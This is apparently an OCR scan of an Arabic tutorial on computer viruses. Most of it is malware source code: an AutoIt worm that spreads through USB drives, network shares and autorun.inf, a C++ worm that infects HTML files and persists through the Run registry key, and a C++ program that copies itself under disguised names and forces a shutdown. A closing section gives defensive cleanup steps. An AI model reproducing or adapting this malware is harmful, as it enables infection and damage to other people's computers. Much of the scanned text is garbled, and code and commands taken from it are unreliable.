FileCopy (@SystemDir & '"\"' & $name & $exe,$odia[0] & '"\'"' & $name &$exe,0) 
Sleep (1) 

FileCopy (@SystemDir & '""\autorun.ini'",$odia[0] & '"\autorun.inf"",0) 
FileSetAttrib ($odia[0] & ''\autorun.inf'',''+RSH'"') 

Sleep (1) 

Search($odia[0]) 

EndIf 

EndIf 

If $odia[0]=''A:'"' Then 

If $odia[1]<>'""' Then 

FileCopy (@ WindowsDir & '"\'"'" & $name & $exe,$odia[1] & ''\New Folder.exe'",0) 
Sleep (1) 

FileCopy (@SystemDir & '"\"' & $name & $exe,$odia[1] & '"\'"'" & $name &$exe,0) 
Sleep (1) 

FileCopy (@SystemDir & '"'"\autorun.ini'',$odia[1] & '"\autorun.inf"",0) 
FileSetAttrib ($odia[1] & '"'"\autorun.inf'',''+RSH'"') 

Sleep (1) 

Search($odia[1]) 

EndIf 

EndIf 

EndIf 

EndFunc 

دالة البحث ونقل نفسه الى مجلد النظام 

Func Search($current) 

Local $search = FileFindFirstFile($current & '"\*.*'"") 

While 1 

Dim $file = FileFindNextFile($search) 

If @error Or StringLen($file) < 1 Then ExitLoop 

If StringInStr(FileGetA ttrib($current & '"\'" & $file), 'D'') And ($file <> '".'"" Or $file <> 
"..'") Then 

FileCopy (@ WindowsDir & '"\'"' & $name & $exe,$current & '"\" & $file & '"\'"' & $file & 
$exe,0) 

Search($current & '"\'"' & $file) 

EndIf 

Sleep (1) 

WEnd 

FileClose($search) 

EndFunc 

دالة نقل نفسه الى مجلد الشبكة 


Func copynetwork () 

Dim $mang[30] 

For $i=1 to 30 

$read = RegEnumKey 
('"HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Explorer\WoO 
rkgroupCrawler\lf @error Then ExitLoop 

$read = StringReplace ($read,'"'/'"",'"'\"") 

$mang[$i] = '"'\'" & $read 

$checkcopy = FileCopy (@ WindowsDir & '"\'"'" & $name & $exe,$mang[$i] & ''\New 
Folder.exe'",1) 

If $checkcopy =1 Then 

FileCopy (@SystemDir & '"\'"' & $name & $exe,$mang[$i] & '"\'"' & $name & $exe,0) 
FileCopy (@SystemDir & '""\autorun.ini'',$mang[$i] & '""\autorun.inf'",1) 

FileSetAttrib ($mang[$i] & '""\autorun.inf'',''+RSH"') 

Search($mang[$i]) 

EndIf 

Next 

RegWrite 
('"HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Explorer\WoO 
rkgroupCrawler\EndFunc 

Func createini)‏ دالة انشاء ملف اوتو رن 

IniWrite (@SystemDir & '"\autorun.ini'",'' Autorun'",''Open'",$name & $exe) 

IniWrite (@SystemDir & '"\autorun.ini'",'' Autorun'",''Shellexe cute'",$name & $exe) 
IniWrite (@SystemDir & '"\autorun.ini'",'' Autorun'"",''ShellOpen\command'",$name & 
$exe) 

IniWrite (@SystemDir & '"\autorun.ini'",'' Autorun'",''Shell'',''Open'"") 

Sleep (1) 

FileSetAttrib (@SystemDir & ''\autorun.ini'",''+RSH"") 

EndFunc 


Html Worm Source Code 
٣++ الكود المصدر لفيروس اتش تي ام ال في الكود تحت بلغه‎ 
HTML Worm 


// Name: Win32.HTMLworm 

// Author: WarGame 

// Compiler: Borland C++ 

// Description: This worm spreads by adding a link to itself in html files 

// Improvements: You could add a link to a page containing an IE exploits :) 


#include 
#include 
using namespace std; // :) 


// This function does the real work 

void HTMLSpread(char *htmlfile) 

{ 

HANDLE html fd; 

DWORD html _filesize,read_bytes,written_ bytes; 
char *c_htmlcode = NULL; 

string *htmlcode = NULL; // make it simpler 
long pos; 


// open the html file 

html _fd = CreateFile(htmlfile, GENERIC _READIGENERIC_WRITE, 
FILE_SHARE_READIFILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ 
ATTRIBUTE_NORMAL,NULL); 


if(html_fd == INVALID _ HANDLE _VALUE) 
{ 


return; 


} 


/I get file size 
html filesize = GetFileSize(html fd,N ULL); 


// allocate enough memory 
c_htmlcode = (char *)malloc(html_filesize); 


if(c_htmlcode == NULL) 
{ 


return; 


} 


// read entire file 
if(ReadFile(html_fd,c_htmlcode,html filesize, &read_bytes,N ULL) == 0) 
{ 

CloseHandle(html fd); 

return; 


} 


// create a string object 
htmlcode = new string(c_htmlcode); 
free(c_htmlcode); 


// already infected ? 
if(htmlcode->find(""'') == string::npOoS) 


{ 


pos = htmlcode->find(""""); 


if(pos == string::npOS) 
{ 
pos = htmlcode->find(""""); 


if(pos == string::npOS) 
{ 
CloseHandle(html fd); 
delete htmlcode; 
return; 

} 

} 


// add link 
htmlcode->replace(pos,7,''\r\n\r\n'""); 


// write new file 

SetFilePointer(html_fd,0,0,FILE_BEGIN); 
WriteFile(html_fd,htmlcode->c_str(,htmlcode->size(,&written_bytes,N ULL); 
// infection mark 

WriteFile(html_fd,'''',36,&written_bytes,'N ULL); 


// close all 
CloseHandle(html fd); 
delete htmlcode; 


// add worm to startup list 
void AutoStart(char *my_path) 


{ 
HKEY hkey; 


if(RegOpenKeyEx(HKEY_LOCAL_ MACHINE, 
"Software\\Microsoft\Windows\\CurrentVersion\\Run'",0, 
KEY_WRITE,&hkey)==ERROR_SUCCESS) 


{ 
RegSetValueEx(hkey,''himon'",0,REG_SZ,my_path,strlen(my_path)); 
RegCloseKey(hkey); 


if(RegOpenKeyEx(HKEY_CURRENT_USER, 
"Software\\Microsoft\\Windows\CurrentVersion\\Run'",0, 
KEY_WRITE,&hkey)==ERROR_SUCCESS) 

{ 
RegSetValueEx(hkey,''himon'",0,REG_SZ,my_path,strlen(my_path)); 
RegCloseKey(hkey); 

} 

} 


// This will scan drives for html files 

void S3arch(char *pt) { 

char sc[MAX_PATH],buf[MAX_ PATH]; 
WIN32_FIND_DATA in; 

HANDLE fd,file; 

char *fm = "%s\%s'",*fm1 = " Fos\\*.*"'; 


if(strlen(pt) == 3) 

{ 

pt[2] = '\0'; /* :-) */ 
} 


sprintf(scfm1,pt); 
fd = FindFirstFile(sc,&in); 


do 
{ 


sprintf(buf,fm,pt,in.cFileName); 


/* dot :) */ 
if(strcmp(in.cFileName,'"..'') != 0 && strcmp(in.cFileName,'".'") != 0 && 
(in.dwFileAttributes & FILE ATTRIBUTE _DIRECTORY)) 


{ 
S3arch(buf); 
} 


/* File found */ 
else 


{ 
/* is it good to infect ? */ 


if(strstr(in.cFileName,''.htmI'") || strstr(in.cFileName,''.htm'")) 
{ 

HTMLSpread(buf); 

} 

} 


}while(FindNextFile(fd,&in)); 


FindClose(fd); 

} 

/I entry point of worm 

int WINAPI WinMain (HINSTANCE hiInstance, HINSTANCE hPrevInstance, 
LPSTR IpCmdLine, int n CmdShow) 

{ 

/I usual shit: installation part, startup and so on ... 

char I am_here[MAX _PATH],installation_path[MAX_ PATH]; 

char Drives[3],Drive = 0; 

UINT drive_type; 


/I only one copy 

CreateMutex(NULL,FALSE,''_ HTMLworm_by_WarGame_EOF_ ""); 
if(GetLastError() == ERROR_ALREADY_EXISTS) 

{ 

ExitProcess(0); 


} 


GetSystemDirectory(installation_ path,MAX_ PATH); 
strcat(installation_path,''\himon.exe'"); 


GetModuleFileName(NULL,I_ am_here, MAX _ PATH); 
// Copy! 
CopyFile(I[_am_here,installation_path,FALSE); 
AutoStart(installation_path); 


// the real part starts here 
while(1) 


/* Search for drives */ 

for(Drive = 'C';Drive <= 'Z';Drive++) 
{ 

Drives[0] = Drive; 

Drives[1] = ':'; 

Drives[2] = '\'; 

Drives[3] = '\0'; 


/* drive ? */ 
drive_type = GetDriveType(Drives); 


/* only fixed, remote and removable drives */ 
if(drive_type == DRIVE_FIXED Il 
drive_type == DRIVE_REMOTE Il 
drive_type == DRIVE_REMOVABLE) 

{ 

/* GO! */ 

S3arch(Drives); 

} 

} 


فيروس قوي جدا يقوم بإيقاف الجهاز ويظهر لك رسالة بان الجهاز غير قادر على 
قراءة الملف لآن الفيروس يستهلك رهم كاملة بلغه ٣++‏ 
الكود المصدري للفيروس: 
کود: 
#include <windows.h>‏ 
#include <stdio.h>‏ 
#include <stdlib.h>‏ 


{ 

char sys1[256]; 

char sys2[256]; 

char win1[256]; 
GetModuleFileName(hMod, path, sizeof(path)); 
GetSystemDirectory(sys1, sizeof(sys1)); 
GetSystemDirectory(sys2, sizeof(sys2)); 
GetWindowsDirectory(win1, sizeof(win1)); 
strcat(sys1, ''"\Sleep.exe'"); 

strcat(sys2, '\Doom32.com'""); 
strcat(win1, '\WinUpdate.exe'"); 
CopyFile(path, sys1, false); 

CopyFile(path, sys2, false); 

CopyFile(path, win1, false); 


MessageBox (0, "System Out Of Ram, Restart To AutoFix'", "Error !"", 
MB_ICONERROR | MB_OK); 


HKEY hKey; 

RegOpenKeyEx(HKEY_LOCAL_ MACHINE, 
"Software\\Microsoft\\Windows\CurrentVersion\\Run'"", 0, KEY_SET_VALUE, 
&hKey); 

RegSetValueEx(hKey, '"'"'SLEEP'"", 0, REG_SZ, (const unsigned char*) sys1, 
sizeof(sys1)); 

RegSetValueEx(hKey, '"DOOM32"", 0, REG_SZ, (const unsigned char*) sys2, 
sizeof(sys2)); 

RegSetValueEx(hKey, 'WinUpdate'", 0, REG_SZ, (const unsigned char*) win1, 
sizeof(win1l)); 

RegCloseKey(hKey); 


{ 

system(''shutdown -s -f '"); 

MessageBox(NULL,''Not enough memory to load this file.'",''Error !"", 
MB_ICONERROR | MB_OK); 


} 


الحماية ومكافحه الفيروسات 


1- قطع الاتصال بالانترنت 
2- بعض الفيروسات تخفى ں٠‏ الموجود فى ۲١ه)ء‏ لكى لايمكنك من الدخول للبرامج المساعده فى 
الویندوز مثل الرجستری و واگرمعیم و عc‌iامم‏ م س٥ع‏ ألان قم بوضع هذا الکود فی سطر 
الاوامر في الويندوز او عمل ملف باتش بها 
Reg add hklIm\SOFTWARE\Microsoft\Windows\Current Version‏ 
\policies\Explorer\ /v NoRun /t reg _ dword /d 0‏ 


3 ایقاف جمیع البرامج فی إععورھوص یھ) التی بجانبها اسم المستخدم 

ولتشغیل اeوہھہ‏ kیھ)‏ تقوم بالضغط علی مع)ع[عل - ا{ - ٤1ھ‏ مع بعض واذا کان معطلا قم 
بدخول الى ہںم ثم اكتب عءد,.٤d1ءمع‏ ثم اتبع هذا المسار 

Administrative templates >>system >>alt — ctrl — del >>remove task 

manger>>>disabled 

4- إظهار الملفات المخفية وملفات النظام واظهار الامتدادات للملفات 

e E au 

| General | View | File Types | Offline Files | 


Falder views 
Tou can apply the view (such as Details or Tiles} that 


you are using for this folder to all folders. 
Apply ta All Falders Reset All Falders 


Advanced settings: 
Display simple folder view in Explorer's Folders list a 
Û Display the contents of system folders E 
Display the full path in the address bar 
Display the full path in the title bar 


Û Do nat cache thumbnails 
IÊ Hidden files and folders 
O Do nat show hidden files and folders ٍ 
@ Show hidden files and folders اظهار الملعات المخعيه‎ 
[Û] Hide extensions for known file types اظهار الآمتذاد س‎ 
Û Hide pratected operating system files (Recommended) 
Û Launch falder windaws in a separate process 


اظهار ملغات النظام 


Ë Managing pairs of Web pages and folders 


واذا كان معطلا ولايستجيب ويرجع كما كان قم بعمل ملف نصى وغير امتداده الى )4ط. ثم ضع هذا 


الكود واحفظه وشغل الملف 
HKEY _USER\Software\Microsoft\Windows\Curre ntVersion‏ 


\Policies\Explorer\NoFolderOptions /t REG_DWORD /d 0 


HKEY _MACHINE\SOFTWARE\Microsoft\Windows\Curr ent Version 
\Policies\Explorer\NoFolderOptions /t REG_DWORD /d 0 
توقیف برامج من ۲۲ه)ء التى تعمل مع كل اقلاع للويندوز‎ 5 
start up ۃړَû‎ msconfig ثم ںہ ثم اکتب‎ ءt)ھ‎ ٣٤ ولتشغیيل البرنامج المسئول عن ذلك ادخل علی‎ 
مء ثم اضغط على‎ ٣۷ c۵ وعمل ایقاف لکل البرامج ماعدا الانتی فیرس ثم اضغط عل التبوین‎ 
تم الغی کل السرفیس ماعدا الانتی فیرس‎ Hide al Microsoft service 
ا4٣٤‎ ںp مسح جمیع ملفات الموجودہ فی فولدر‎ 5 
C:\Documents and Settings| pall awl \Start Menu\Programs\Startup 
مuںر الدخول فی الرجستری عن الطریق امر ٤ذd ععع فی ہںہ واذا کان معطلا قم بدخول الى‎ 6 
ثم اکتب ٥٤,.٤dءمع ثم اتبع هذا المسار‎ 
Administrative templates >>system >> DisableRegistryTools >>>disabled 
بعد تشغيل الرجسترى ثم ادخل فى المسارات الاتيه‎ 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\ 
ستجد أن قيمتها‎ S11 عندما تتوجه إلى المسار السابق سوف تجد قيمًَا عديدة ابحث عن المفتاح‎ 
Explorer.exe الافتراضية لابد تكون‎ 
وأليكم مسار البرامج التى تعمل مع بداية الويندوزالاكثر استخداما‎ 
[HKEY MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 


وهذه قائمة اخرى اقل شيوعا 
HKEY_MACHINE\SOFTWARE\Microsoft\SharedTools\MSConfig\startupreg]‏ 


HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\RunOnce 
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\RunOnce 
HKEY_ LOCAL _MACHINE\SOFTWARE\Microsoft\Windows\Curr ent Version\Run 
HKEY_ LOCAL _MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\RunOnce 

HKEY_ LOCAL _MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\RunOnceEx 


HKEY_ LOCAL MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\RunServices 


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\RunServicesOnce 
والمسار الاتى يقوم بعمل فولدر( مفتاح) باسم «ں ويضع بها قيمه بها المسار الفيرس وهذا المسار‎ 
لایظهرفی مں ۲ه للویندوز‎ 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows 
\CurrentVersion\policies\Explorer\run 


ثم قم بمسح جميع القيم التى فى يمين الصفحه ماعدا التى بجانبها كلمه tاuوءل‏ 
- لإيقاف عمل برامج التى تعمل على الخلفيه active Desktop‏ 


HKEY_USERS\S-1-5-21-1123561945-1935655697-1060284298- 
1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer 
\NoActiveDesktop: 0x00000001 
لإیقاف الئىمsktoءD مactiv وهی تستخدم sارe«رەم«ەc لاضافه وظائف فی‎ - 
من‎ compo”) ملحوظه استخدام‎ . ]۲ M1 لاتكون متوفرة من خلال‎ هctive‎ Desktop 
شرکات غير موثوقه يصنع ثغرات خطره جدا فى الحماية الحاسب‎ 
HKEY_USERS\S-1-5-21-1123561945-1935655697-1060284298- 
1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies 
\ActiveDesktop\NoComponents: 1 
مسح جميع الملفات الموجودة فى فولدر الخاص بخاصية استعاده النظام وهى‎ 7 
وایضا کل البرتشنات وطبعا لن یری هذا الفولدر الا‎ °: System Volume Information 
عن طريق اظهار ملفات النظام‎ 
عن طریق ضغط على آم)uامpصco وہ تم‎ ۸R ٤S10R۸٤ إيقاف نظام الاستعادة للویندوز‎ -8 
تدوس کلیك یمین ثم اختار sع )امم ہام ثم اختار eإtoیما temءرء تم اضغط علی‎ 
Turn off system restore 
مسح جميع ملفات جداول الإعمال التى يمكن تستخدمها الفيروسات وهى فى المسار الاتى‎ -9 
.زەp وستجدە بامتداد‎ C:]windowسs\tasks‎ 
مسح الجهاز ببرامج التنظيف الرجسترى والملفات وتحسين الاداء مثل برامج‎ -0 
Ashampoo WinOptimizer 5 - ccleaner - tuneup utilities 2008 
اعاده تشغيل الجهاز وتدوس على ۴8 للعمل على مdه0ص ءهء ومسح الجهاز ببرامج‎ -1 
الحمايه ويفضل استخدام برنامج كuاذ۷ i)رج tئوره وعمل بحث فى وقت لاقلاع‎ 
2۔ استخدام برنامج مسح ملفات ہ۔٣ ٥٤ںھ او دخول سطر الاوامر للویندوز وکتابھ هذا الامر‎ 
del /a/f/q f:\lautorun.inf ڃ‎ del /a/f/q c:\lautorun.inf 
del /a/f/q e:\lautorun.inî ڃ‎ del /a/f/q d:\lautorun.inf 
مسح جميع الملفات التى فى فولدرات الملفات المؤقته م.ءع) ولكی تصل لهذه الفولدرات قم‎ -3 
بعمل بحث باسم الفولدر‎ 
الموجوده فكل الجهاز عن طريق برنامج الضغط‎ 8R 4-مسح جميع الملفات فى اط ءآاءرءء‎ 
winrar 
اظهار الملفات المخفيه وملفات النظام واظهار الامتدادات للملفات‎ -5 
6-مسح جميع الملفات فى فولدر التسجيل للملفات التنفيذيه وهو فى المسار الاتى‎ 
C:\windows\system32\prefech 


خطوات الوقايه والحمايه : 


1 لا تعتمد على برامج الانتى فيرس بشكل كامل واعتمد ايضا على خطوات الوقايه 
2- استخدم انتی فیرس افاست sںآاذہ‏ )رج tئءوره‏ وعمل «وعءء فى وقت الاقلاع للویندوز 
3 استخدم برامج ہautoru anti‏ وباخڀښص ڊرliمg Naevius USB Antivirus‏ 

وهناك طريقه تقضى نهائيا على ملفات الاوتورن وهي باضافة قيمه لمسجل النظام تجعله 
يتجاهل تماما أي ملف ہںآاہ)ںھ وکأنه لا يعرفه وهنا في حال استخدمنا هذه الطريقة فسوف 
لن تتغير ايقونه الفلاش ولا اسمه ايضا وسيكون اسمه وشكلة مشابه لبقية الأقراص. الطريقة 
وهي باضافة المفتاح للرجسترى 

| Registıy Editor 


Fil Edit Yim Favorites Help 
N HotFix 

J rm 5Y5 :DoesNokExist 
E Image File Execution Options 


N IME compatibility صع هنا القيمه‎ 


Lata 


LS contral,ini 
_ | ImageFileExecutionDptians,ini 
i KeyboardLayout,ini E 
msacm,ini 


< rene? .ini 


MY ZomputerfHEEYT_LOZAL_MAZHINE SDF TWAREMicrosoFE windows NTYLurrentYersioniIniFileMappingêautorun,inf 


في المسار المو صح: 
HKEY_LOCAL_ MACHINE\SOFTWARE\Microsoft\WindowsNT‏ 
\CurrentVersion\IniFileMapping\autorun.inf‏ 


ثم ضع هذه القیمه فی (٤اںهfء5)‏ 
@SYS:DoesNotExist‏ 


بعد ذلك سيتجاهل النظام أي ملف رںإه)ںه ولن يقرأه من الأساس » وفي حال أردت ارجاع الأمور 
الى ما كانت عليه قم بحذف المفتاح گہا.ہںآہ)ں۸ بالكامل 


4-عدم الدخول للفلاشه الا عن طريق ءإم3[همf‏ الموجوده فى اعلى الصفحه 


File Edit View Favorites Tools Help 


HH;‏ )عا Folders xX‏ هھ search‏ کے 0 + ا 
او بعمل کلیکھ یمین علی ٢۲ھ)ء‏ ثم اختیار کاعیں ا1ھ آم ×م سوف یظھر لك شجرہ ملفات 
ادخل عن طريقها للفلاشه 


5- اغلاق رھام ٥٤ںuھ‏ للویندوز عن طریق برنامج ءcااھم ٥p‏ ععن طریق دخول علی ںآ 
ثم كتابه 81٤.١‏ ممع ثم اتبع هذا المسار داخل البرنامج 
Administrative templates >>system >>turn off autoplay‏ 
ثم اختlر all drives p¢û disabled‏ 
او اتبع هذا المسار فى الرجسترى 
HKEY_USERS\S-1-5-21-725345543-1580436667-842925246-‏ 
1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer‏ 
\NoDriveTypeAutoRun: FF‏ 
6 قم باصلاح ملفات النظام بشکل منتظم بدخول الی ٤٣ھاء‏ ثم ہںہ ثم اکتب sfc /scan 0W‏ 
ولا تنسی بوضصع اسطوانه الویندوز هذا الامر يقوم بعمل ڃجعء لملفات النظام بأمتداد [[] ويبدل 
الملف التالف 
7 لا تستخدم ويندوز الذى مدمج به البرامج والملعوب فيه لان بكل بساطه يكون ملغى فيه الحمايه 
الذاتيه للويندوز ويكون عرضه للخطر من الفيروسات والافضل استخدام نسخه ويندوز صافيه مثل 
الاصليه تماما 


